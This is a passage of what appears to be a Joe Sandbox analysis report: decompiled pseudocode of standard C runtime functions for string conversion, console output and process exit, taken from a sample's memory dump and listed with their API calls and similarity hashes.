        					} else {
        						_t99 = E00AB914F(_t67, _t99);
        						L7:
        						_t70 = _a32;
        						if(_t70 == 0) {
        							_t70 =  *( *_v44 + 8);
        							_a32 = _t70;
        						}
        						if(_t128 == 0 || _t99 == 0) {
        							if(_t128 != _t99) {
        								if(_t99 <= 1) {
        									if(_t128 <= 1) {
        										if(GetCPInfo(_t70,  &_v28) == 0) {
        											goto L5;
        										} else {
        											if(_t128 <= 0) {
        												if(_t99 <= 0) {
        													goto L36;
        												} else {
        													_t89 = 2;
        													if(_v28 >= _t89) {
        														_t114 =  &_v22;
        														if(_v22 != 0) {
        															_t131 = _v40;
        															while(1) {
        																_t122 =  *((intOrPtr*)(_t114 + 1));
        																if(_t122 == 0) {
        																	goto L15;
        																}
        																_t101 =  *_t131;
        																if(_t101 <  *_t114 || _t101 > _t122) {
        																	_t114 = _t114 + _t89;
        																	if( *_t114 != 0) {
        																		continue;
        																	} else {
        																		goto L15;
        																	}
        																}
        																goto L63;
        															}
        														}
        													}
        													goto L15;
        												}
        											} else {
        												_t92 = 2;
        												if(_v28 >= _t92) {
        													_t115 =  &_v22;
        													if(_v22 != 0) {
        														while(1) {
        															_t123 =  *((intOrPtr*)(_t115 + 1));
        															if(_t123 == 0) {
        																goto L17;
        															}
        															_t102 =  *_t125;
        															if(_t102 <  *_t115 || _t102 > _t123) {
        																_t115 = _t115 + _t92;
        																if( *_t115 != 0) {
        																	continue;
        																} else {
        																	goto L17;
        																}
        															}
        															goto L63;
        														}
        													}
        												}
        												goto L17;
        											}
        										}
        									} else {
        										L17:
        										_push(3);
        										goto L13;
        									}
        								} else {
        									L15:
        								}
        							} else {
        								_push(2);
        								L13:
        							}
        						} else {
        							L36:
        							_t126 = 0;
        							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
        							_v44 = _t72;
        							if(_t72 == 0) {
        								L5:
        							} else {
        								_t120 = _t72 + _t72;
        								asm("sbb eax, eax");
        								if((_t120 + 0x00000008 & _t72) == 0) {
        									_t73 = 0;
        									_v32 = 0;
        									goto L45;
        								} else {
        									asm("sbb eax, eax");
        									_t85 = _t72 & _t120 + 0x00000008;
        									_t112 = _t120 + 8;
        									if((_t72 & _t120 + 0x00000008) > 0x400) {
        										asm("sbb eax, eax");
        										_t87 = E00AB46B0(_t112, _t85 & _t112);
        										_v32 = _t87;
        										if(_t87 == 0) {
        											goto L61;
        										} else {
        											 *_t87 = 0xdddd;
        											goto L43;
        										}
        									} else {
        										asm("sbb eax, eax");
        										E00ABBFA0();
        										_t87 = _t133;
        										_v32 = _t87;
        										if(_t87 == 0) {
        											L61:
        											_t100 = _v32;
        										} else {
        											 *_t87 = 0xcccc;
        											L43:
        											_t73 =  &(_t87[4]);
        											_v32 = _t73;
        											L45:
        											if(_t73 == 0) {
        												goto L61;
        											} else {
        												_t129 = _a32;
        												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
        													goto L61;
        												} else {
        													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
        													_v36 = _t77;
        													if(_t77 == 0) {
        														goto L61;
        													} else {
        														_t121 = _t77 + _t77;
        														_t108 = _t121 + 8;
        														asm("sbb eax, eax");
        														if((_t121 + 0x00000008 & _t77) == 0) {
        															_t130 = _t126;
        															goto L56;
        														} else {
        															asm("sbb eax, eax");
        															_t81 = _t77 & _t121 + 0x00000008;
        															_t108 = _t121 + 8;
        															if((_t77 & _t121 + 0x00000008) > 0x400) {
        																asm("sbb eax, eax");
        																_t130 = E00AB46B0(_t108, _t81 & _t108);
        																_pop(_t108);
        																if(_t130 == 0) {
        																	goto L59;
        																} else {
        																	 *_t130 = 0xdddd;
        																	goto L54;
        																}
        															} else {
        																asm("sbb eax, eax");
        																E00ABBFA0();
        																_t130 = _t133;
        																if(_t130 == 0) {
        																	L59:
        																	_t100 = _v32;
        																} else {
        																	 *_t130 = 0xcccc;
        																	L54:
        																	_t130 =  &(_t130[4]);
        																	L56:
        																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
        																		goto L59;
        																	} else {
        																		_t100 = _v32;
        																		_t126 = E00AB6333(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
        																	}
        																}
        															}
        														}
        														E00AB6F6B(_t130);
        													}
        												}
        											}
        										}
        									}
        								}
        								E00AB6F6B(_t100);
        							}
        						}
        					}
        				}
        				L63:
        				return E00AB29BB(_v8 ^ _t132);
        			}
        Instruction address column for the E00AB928E listing (one address per C line in the original layout, extracted here out of alignment): addresses span 0x00ab9296 to 0x00ab9535; 0x00000000 entries are lines the decompiler did not map to an instruction.

        APIs
        • GetCPInfo.KERNEL32(00D6ED00,00D6ED00,?,7FFFFFFF,?,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?,00D6ED00), ref: 00AB933A
        • MultiByteToWideChar.KERNEL32(00D6ED00,00000009,00D6ED00,00D6ED00,00000000,00000000,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?), ref: 00AB93BD
        • __alloca_probe_16.LIBCMT ref: 00AB93F5
        • MultiByteToWideChar.KERNEL32(00D6ED00,00000001,00D6ED00,00D6ED00,00000000,00AB9567,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?), ref: 00AB9450
        • __alloca_probe_16.LIBCMT ref: 00AB949F
        • MultiByteToWideChar.KERNEL32(00D6ED00,00000009,00D6ED00,00D6ED00,00000000,00000000,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?), ref: 00AB9467
          • Part of subcall function 00AB46B0: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        • MultiByteToWideChar.KERNEL32(00D6ED00,00000001,00D6ED00,00D6ED00,00000000,00D6ED00,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?), ref: 00AB94E3
        • __freea.LIBCMT ref: 00AB950E
        • __freea.LIBCMT ref: 00AB951A
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
        • String ID: ]iL
        • API String ID: 201697637-4085116960
        • Opcode ID: 19fc53a6d0f502e714717bc35737a6539c30a0825055e71e76ac0dcc84fcb44a
        • Instruction ID: bde736908034529200627370a0500d310a3187072938e517bfbd422551347666
        • Opcode Fuzzy Hash: 19fc53a6d0f502e714717bc35737a6539c30a0825055e71e76ac0dcc84fcb44a
        • Instruction Fuzzy Hash: C991A171E00216ABDB258FA5C885AEF7BFDAF09710F184259EA05EB283D735DC45CB60
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 69%
        			E00AB8853(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
        				signed int _v8;
        				int _v12;
        				void* _v24;
        				signed int _t49;
        				signed int _t54;
        				int _t58;
        				signed int _t60;
        				short* _t62;
        				signed int _t66;
        				short* _t70;
        				int _t71;
        				int _t78;
        				short* _t81;
        				signed int _t87;
        				signed int _t90;
        				void* _t95;
        				void* _t96;
        				int _t98;
        				short* _t101;
        				int _t103;
        				signed int _t106;
        				short* _t107;
        				void* _t110;
        
        				_push(__ecx);
        				_push(__ecx);
        				_t49 =  *0xac3018; // 0x4c695d09
        				_v8 = _t49 ^ _t106;
        				_push(__esi);
        				_t103 = _a20;
        				if(_t103 > 0) {
        					_t78 = E00AB914F(_a16, _t103);
        					_t110 = _t78 - _t103;
        					_t4 = _t78 + 1; // 0x1
        					_t103 = _t4;
        					if(_t110 >= 0) {
        						_t103 = _t78;
        					}
        				}
        				_t98 = _a32;
        				if(_t98 == 0) {
        					_t98 =  *( *_a4 + 8);
        					_a32 = _t98;
        				}
        				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
        				_v12 = _t54;
        				if(_t54 == 0) {
        					L38:
        					return E00AB29BB(_v8 ^ _t106);
        				} else {
        					_t95 = _t54 + _t54;
        					_t85 = _t95 + 8;
        					asm("sbb eax, eax");
        					if((_t95 + 0x00000008 & _t54) == 0) {
        						_t81 = 0;
        						__eflags = 0;
        						L14:
        						if(_t81 == 0) {
        							L36:
        							_t105 = 0;
        							L37:
        							E00AB6F6B(_t81);
        							goto L38;
        						}
        						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
        						_t121 = _t58;
        						if(_t58 == 0) {
        							goto L36;
        						}
        						_t100 = _v12;
        						_t60 = E00AB6564(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
        						_t105 = _t60;
        						if(_t105 == 0) {
        							goto L36;
        						}
        						if((_a12 & 0x00000400) == 0) {
        							_t96 = _t105 + _t105;
        							_t87 = _t96 + 8;
        							__eflags = _t96 - _t87;
        							asm("sbb eax, eax");
        							__eflags = _t87 & _t60;
        							if((_t87 & _t60) == 0) {
        								_t101 = 0;
        								__eflags = 0;
        								L30:
        								__eflags = _t101;
        								if(__eflags == 0) {
        									L35:
        									E00AB6F6B(_t101);
        									goto L36;
        								}
        								_t62 = E00AB6564(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
        								__eflags = _t62;
        								if(_t62 == 0) {
        									goto L35;
        								}
        								_push(0);
        								_push(0);
        								__eflags = _a28;
        								if(_a28 != 0) {
        									_push(_a28);
        									_push(_a24);
        								} else {
        									_push(0);
        									_push(0);
        								}
        								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
        								__eflags = _t105;
        								if(_t105 != 0) {
        									E00AB6F6B(_t101);
        									goto L37;
        								} else {
        									goto L35;
        								}
        							}
        							_t90 = _t96 + 8;
        							__eflags = _t96 - _t90;
        							asm("sbb eax, eax");
        							_t66 = _t60 & _t90;
        							_t87 = _t96 + 8;
        							__eflags = _t66 - 0x400;
        							if(_t66 > 0x400) {
        								__eflags = _t96 - _t87;
        								asm("sbb eax, eax");
        								_t101 = E00AB46B0(_t87, _t66 & _t87);
        								_pop(_t87);
        								__eflags = _t101;
        								if(_t101 == 0) {
        									goto L35;
        								}
        								 *_t101 = 0xdddd;
        								L28:
        								_t101 =  &(_t101[4]);
        								goto L30;
        							}
        							__eflags = _t96 - _t87;
        							asm("sbb eax, eax");
        							E00ABBFA0();
        							_t101 = _t107;
        							__eflags = _t101;
        							if(_t101 == 0) {
        								goto L35;
        							}
        							 *_t101 = 0xcccc;
        							goto L28;
        						}
        						_t70 = _a28;
        						if(_t70 == 0) {
        							goto L37;
        						}
        						_t125 = _t105 - _t70;
        						if(_t105 > _t70) {
        							goto L36;
        						}
        						_t71 = E00AB6564(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
        						_t105 = _t71;
        						if(_t71 != 0) {
        							goto L37;
        						}
        						goto L36;
        					}
        					asm("sbb eax, eax");
        					_t72 = _t54 & _t95 + 0x00000008;
        					_t85 = _t95 + 8;
        					if((_t54 & _t95 + 0x00000008) > 0x400) {
        						__eflags = _t95 - _t85;
        						asm("sbb eax, eax");
        						_t81 = E00AB46B0(_t85, _t72 & _t85);
        						_pop(_t85);
        						__eflags = _t81;
        						if(__eflags == 0) {
        							goto L36;
        						}
        						 *_t81 = 0xdddd;
        						L12:
        						_t81 =  &(_t81[4]);
        						goto L14;
        					}
        					asm("sbb eax, eax");
        					E00ABBFA0();
        					_t81 = _t107;
        					if(_t81 == 0) {
        						goto L36;
        					}
        					 *_t81 = 0xcccc;
        					goto L12;
        				}
        			}

        APIs
        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00AB5C57,00000000,?,?,?,00AB8AA4,?,?,00000100), ref: 00AB88AD
        • __alloca_probe_16.LIBCMT ref: 00AB88E5
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00AB8AA4,?,?,00000100,5EFC4D8B,?,?), ref: 00AB8933
        • __alloca_probe_16.LIBCMT ref: 00AB89CA
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AB8A2D
        • __freea.LIBCMT ref: 00AB8A3A
          • Part of subcall function 00AB46B0: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        • __freea.LIBCMT ref: 00AB8A43
        • __freea.LIBCMT ref: 00AB8A68
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
        • String ID: ]iL
        • API String ID: 3864826663-4085116960
        • Opcode ID: 9a4f6ce10222ee5c9348d91d957ecc4af210eae6873f0526a63f4cefb66e2d9b
        • Instruction ID: 90cc9d086417752cca285015a1420d043982fc9b2066483c8e7693a3766a40c9
        • Opcode Fuzzy Hash: 9a4f6ce10222ee5c9348d91d957ecc4af210eae6873f0526a63f4cefb66e2d9b
        • Instruction Fuzzy Hash: 4251D172610216ABDF258F68DC81EFB77ADEB44B90F19422AF805D6142EF38DC40D690
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E00AB96AD(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
        				signed int _v8;
        				signed char _v15;
        				char _v16;
        				void _v24;
        				short _v28;
        				char _v31;
        				void _v32;
        				long _v36;
        				intOrPtr _v40;
        				void* _v44;
        				signed int _v48;
        				signed char* _v52;
        				long _v56;
        				int _v60;
        				signed int _t78;
        				signed int _t80;
        				int _t86;
        				void* _t94;
        				long _t97;
        				void _t105;
        				void* _t112;
        				signed int _t116;
        				signed int _t118;
        				signed char _t123;
        				signed char _t128;
        				intOrPtr _t129;
        				signed int _t131;
        				signed char* _t133;
        				intOrPtr* _t135;
        				signed int _t136;
        				void* _t137;
        
        				_t78 =  *0xac3018; // 0x4c695d09
        				_v8 = _t78 ^ _t136;
        				_t80 = _a8;
        				_t118 = _t80 >> 6;
        				_t116 = (_t80 & 0x0000003f) * 0x30;
        				_t133 = _a12;
        				_v52 = _t133;
        				_v48 = _t118;
        				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xac3f60 + _t118 * 4)) + _t116 + 0x18));
        				_v40 = _a16 + _t133;
        				_t86 = GetConsoleCP();
        				_t135 = _a4;
        				_v60 = _t86;
        				 *_t135 = 0;
        				 *((intOrPtr*)(_t135 + 4)) = 0;
        				 *((intOrPtr*)(_t135 + 8)) = 0;
        				while(_t133 < _v40) {
        					_v28 = 0;
        					_v31 =  *_t133;
        					_t129 =  *((intOrPtr*)(0xac3f60 + _v48 * 4));
        					_t123 =  *(_t129 + _t116 + 0x2d);
        					if((_t123 & 0x00000004) == 0) {
        						if(( *(E00AB6BA1(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
        							_push(1);
        							_push(_t133);
        							goto L8;
        						} else {
        							if(_t133 >= _v40) {
        								_t131 = _v48;
        								 *((char*)( *((intOrPtr*)(0xac3f60 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
        								 *( *((intOrPtr*)(0xac3f60 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xac3f60 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
        								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
        							} else {
        								_t112 = E00AB7F6A( &_v28, _t133, 2);
        								_t137 = _t137 + 0xc;
        								if(_t112 != 0xffffffff) {
        									_t133 =  &(_t133[1]);
        									goto L9;
        								}
        							}
        						}
        					} else {
        						_t128 = _t123 & 0x000000fb;
        						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
        						_push(2);
        						_v15 = _t128;
        						 *(_t129 + _t116 + 0x2d) = _t128;
        						_push( &_v16);
        						L8:
        						_push( &_v28);
        						_t94 = E00AB7F6A();
        						_t137 = _t137 + 0xc;
        						if(_t94 != 0xffffffff) {
        							L9:
        							_t133 =  &(_t133[1]);
        							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
        							_v56 = _t97;
        							if(_t97 != 0) {
        								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
        									L19:
        									 *_t135 = GetLastError();
        								} else {
        									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
        									if(_v36 >= _v56) {
        										if(_v31 != 0xa) {
        											goto L16;
        										} else {
        											_t105 = 0xd;
        											_v32 = _t105;
        											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
        												goto L19;
        											} else {
        												if(_v36 >= 1) {
        													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
        													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
        													goto L16;
        												}
        											}
        										}
        									}
        								}
        							}
        						}
        					}
        					goto L20;
        					L16:
        				}
        				L20:
        				return E00AB29BB(_v8 ^ _t136);
        			}

        APIs
        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00AB9E22,?,00000000,?,00000000,00000000), ref: 00AB96EF
        • __fassign.LIBCMT ref: 00AB976A
        • __fassign.LIBCMT ref: 00AB9785
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00AB97AB
        • WriteFile.KERNEL32(?,?,00000000,00AB9E22,00000000,?,?,?,?,?,?,?,?,?,00AB9E22,?), ref: 00AB97CA
        • WriteFile.KERNEL32(?,?,00000001,00AB9E22,00000000,?,?,?,?,?,?,?,?,?,00AB9E22,?), ref: 00AB9803
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
        • String ID: ]iL
        • API String ID: 1324828854-4085116960
        • Opcode ID: 032ad9d89667bbec35f61f843c55e6bdb9585941bdecb35c29c1937912b38e99
        • Instruction ID: ff9e750598735ab538c20d7302039bacfa5b5fd34d9be379155d6637dd5a32e2
        • Opcode Fuzzy Hash: 032ad9d89667bbec35f61f843c55e6bdb9585941bdecb35c29c1937912b38e99
        • Instruction Fuzzy Hash: A8518375D00249DFDB10CFE8D885AEEBBF9EF09310F14455AEA56E7252E730A941CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E00AB6E4E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
        				signed int _v8;
        				int _v12;
        				char _v16;
        				intOrPtr _v24;
        				char _v28;
        				void* _v40;
        				signed int _t34;
        				signed int _t40;
        				int _t46;
        				int _t53;
        				void* _t55;
        				int _t57;
        				signed int _t63;
        				int _t67;
        				short* _t69;
        				signed int _t70;
        				short* _t71;
        
        				_t34 =  *0xac3018; // 0x4c695d09
        				_v8 = _t34 ^ _t70;
        				E00AB47F8(__ebx,  &_v28, __edx, _a4);
        				_t57 = _a24;
        				if(_t57 == 0) {
        					_t53 =  *(_v24 + 8);
        					_t57 = _t53;
        					_a24 = _t53;
        				}
        				_t67 = 0;
        				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
        				_v12 = _t40;
        				if(_t40 == 0) {
        					L15:
        					if(_v16 != 0) {
        						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
        					}
        					return E00AB29BB(_v8 ^ _t70);
        				}
        				_t55 = _t40 + _t40;
        				_t17 = _t55 + 8; // 0x8
        				asm("sbb eax, eax");
        				if((_t17 & _t40) == 0) {
        					_t69 = 0;
        					L11:
        					if(_t69 != 0) {
        						E00AB2CE0(_t67, _t69, _t67, _t55);
        						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
        						if(_t46 != 0) {
        							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
        						}
        					}
        					L14:
        					E00AB6F6B(_t69);
        					goto L15;
        				}
        				_t20 = _t55 + 8; // 0x8
        				asm("sbb eax, eax");
        				_t48 = _t40 & _t20;
        				_t21 = _t55 + 8; // 0x8
        				_t63 = _t21;
        				if((_t40 & _t20) > 0x400) {
        					asm("sbb eax, eax");
        					_t69 = E00AB46B0(_t63, _t48 & _t63);
        					if(_t69 == 0) {
        						goto L14;
        					}
        					 *_t69 = 0xdddd;
        					L9:
        					_t69 =  &(_t69[4]);
        					goto L11;
        				}
        				asm("sbb eax, eax");
        				E00ABBFA0();
        				_t69 = _t71;
        				if(_t69 == 0) {
        					goto L14;
        				}
        				 *_t69 = 0xcccc;
        				goto L9;
        			}

        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00AB5C57,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00AB6E9B
        • __alloca_probe_16.LIBCMT ref: 00AB6ED3
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AB6F24
        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AB6F36
        • __freea.LIBCMT ref: 00AB6F3F
          • Part of subcall function 00AB46B0: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
        • String ID: ]iL
        • API String ID: 313313983-4085116960
        • Opcode ID: e82b57a51d2119ff523c7831b94055f3f3ceeb8f332dd6508494e7d8ee4b1603
        • Instruction ID: 78469a0cef44c8f56182e8b3dd55497a7283d6760a51c567aa092d7df6090c70
        • Opcode Fuzzy Hash: e82b57a51d2119ff523c7831b94055f3f3ceeb8f332dd6508494e7d8ee4b1603
        • Instruction Fuzzy Hash: DB31BD32A1020AABDB249F74EC45EFE7BA9EF40310F044129FC05D6252EB39CD51CB90
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AB3E77,00000003,?,00AB3E17,00000003,00AC1DE8,0000000C,00AB3F2A,00000003,00000002), ref: 00AB3EA2
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AB3EB5
        • FreeLibrary.KERNEL32(00000000,?,?,?,00AB3E77,00000003,?,00AB3E17,00000003,00AC1DE8,0000000C,00AB3F2A,00000003,00000002,00000000), ref: 00AB3ED8
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: ]iL$CorExitProcess$mscoree.dll
        • API String ID: 4061214504-3098782845
        • Opcode ID: 19e9a03ac136d47b53d3df79c99b8db0616c0195f725fb1f4e14c661886e180e
        • Instruction ID: 979111af1f75f3d913a794bcbbfe920a08ee2e10651d704b5160e5b4f0c1510d
        • Opcode Fuzzy Hash: 19e9a03ac136d47b53d3df79c99b8db0616c0195f725fb1f4e14c661886e180e
        • Instruction Fuzzy Hash: 60F04F31A0020DBBCB15AB95DD09BDEBFBDEB44711F010169F80AA2162EB318A52DB90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E00AB9D28(void* __ebx, void* __edi, void* __esi, signed int _a4, void* _a8, signed int _a12) {
        				signed int _v8;
        				long _v12;
        				struct _OVERLAPPED* _v16;
        				long _v20;
        				char _v24;
        				signed int _v28;
        				signed int _v32;
        				intOrPtr _v36;
        				signed int _v40;
        				signed int _v44;
        				intOrPtr _v48;
        				void* _v52;
        				signed int _t62;
        				intOrPtr _t66;
        				signed char _t68;
        				signed int _t69;
        				signed int _t71;
        				signed int _t73;
        				signed int _t74;
        				signed int _t77;
        				intOrPtr _t79;
        				signed int _t87;
        				signed int _t90;
        				signed int _t106;
        				signed int _t107;
        				signed int _t110;
        				intOrPtr _t112;
        				signed int _t117;
        				signed int _t119;
        				void* _t121;
        				signed int _t124;
        				signed int _t126;
        				signed int _t128;
        				void* _t129;
        
        				_t62 =  *0xac3018; // 0x4c695d09
        				_v8 = _t62 ^ _t128;
        				_t110 = _a12;
        				_v12 = _t110;
        				_t124 = _a4;
        				_t121 = _a8;
        				_v52 = _t121;
        				if(_t110 != 0) {
        					__eflags = _t121;
        					if(_t121 != 0) {
        						_push(__ebx);
        						_t106 = _t124 >> 6;
        						_t119 = (_t124 & 0x0000003f) * 0x30;
        						_v32 = _t106;
        						_t66 =  *((intOrPtr*)(0xac3f60 + _t106 * 4));
        						_v48 = _t66;
        						_v28 = _t119;
        						_t107 =  *((intOrPtr*)(_t66 + _t119 + 0x29));
        						__eflags = _t107 - 2;
        						if(_t107 == 2) {
        							L6:
        							_t68 =  !_t110;
        							__eflags = _t68 & 0x00000001;
        							if((_t68 & 0x00000001) != 0) {
        								_t66 = _v48;
        								L9:
        								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020;
        								if(__eflags != 0) {
        									E00ABA22B(_t124, 0, 0, 2);
        									_t129 = _t129 + 0x10;
        								}
        								_t69 = E00AB98CD(_t107, _t119, __eflags, _t124);
        								__eflags = _t69;
        								if(_t69 == 0) {
        									_t112 =  *((intOrPtr*)(0xac3f60 + _v32 * 4));
        									_t71 = _v28;
        									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080;
        									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) {
        										_v24 = 0;
        										_v20 = 0;
        										_v16 = 0;
        										_t73 = WriteFile( *(_t112 + _t71 + 0x18), _t121, _v12,  &_v20, 0);
        										__eflags = _t73;
        										if(_t73 == 0) {
        											_v24 = GetLastError();
        										}
        										goto L28;
        									}
        									_t87 = _t107;
        									__eflags = _t87;
        									if(_t87 == 0) {
        										E00AB9943(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
        										goto L17;
        									}
        									_t90 = _t87 - 1;
        									__eflags = _t90;
        									if(_t90 == 0) {
        										_t89 = E00AB9B10(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
        										goto L17;
        									}
        									__eflags = _t90 != 1;
        									if(_t90 != 1) {
        										goto L34;
        									}
